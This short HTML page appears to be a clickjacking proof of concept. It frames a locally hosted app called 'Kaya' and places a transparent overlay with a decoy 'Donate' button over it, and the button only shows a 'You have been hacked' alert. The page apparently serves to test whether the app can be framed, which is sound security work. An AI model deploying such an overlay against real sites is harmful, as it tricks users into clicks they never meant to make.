<!DOCTYPE html>
<html>
<head>
  <title>KAYA</title>
  <style type="text/css">
    html {
      overflow: auto;
    }

    html,
    body,
    div,
    iframe {
      margin: 0px;
      padding: 0px;
      height: 100%;
      border: none;
      display: block;
      width: 100%;
      border: none;
      overflow-y: auto;
      overflow-x: hidden;
    }

    #overlay {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: transparent;
    }

    #button {
      position: absolute;
      top: 71.5%;
      left: 49.5%;
      transform: translate(-50%, -50%);
      width: 161px;
      height: 60px;
    }
  </style>
</head>
<body>
  <iframe frameborder="0" 
    marginheight="0" 
    marginwidth="0" 
    width="100%" 
    height="100%" 
    scrolling="auto"
    src="http://127.0.0.1:8000/kaya/" title="Kaya"></iframe>

  <div id="overlay">
    <button id="button" onclick="alert('You have been hacked')"><h1>Donate</h1></button>
  </div>
</body>
</html>
